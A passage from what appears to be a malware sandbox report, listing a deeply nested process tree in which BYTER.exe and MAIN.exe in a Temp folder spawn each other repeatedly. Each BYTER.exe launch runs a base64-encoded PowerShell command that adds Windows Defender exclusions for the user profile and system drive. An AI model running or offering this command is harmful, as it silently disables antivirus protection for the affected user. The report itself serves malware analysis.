        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        58⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        58⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        59⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        59⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        60⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        60⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        61⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        61⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        62⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        62⤵
        
        PID:5476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        63⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        63⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        64⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        64⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        65⤵
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        65⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        66⤵
        
        PID:5320
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        66⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        67⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        67⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        68⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        68⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        69⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        69⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        70⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        70⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        71⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        71⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        72⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        72⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        73⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        73⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        74⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        74⤵
        
        PID:576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        75⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        75⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        76⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        76⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        77⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        77⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        78⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        78⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        79⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        79⤵
        
        PID:2804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        80⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        80⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        81⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        81⤵
        
        PID:4268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        82⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        82⤵
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        82⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        81⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        80⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        79⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        78⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        77⤵
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        76⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        75⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        74⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        73⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        72⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        71⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        70⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        69⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        68⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        67⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        66⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        65⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        64⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        63⤵
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        62⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        61⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        60⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        59⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        58⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        57⤵
        
        PID:796
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        56⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        55⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        54⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        53⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        52⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        51⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        50⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        49⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        48⤵
        
        PID:5304
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        47⤵
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        46⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        45⤵
        
        PID:5216
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        44⤵
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        43⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        42⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        41⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        40⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        39⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        38⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
        37⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\MAIN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
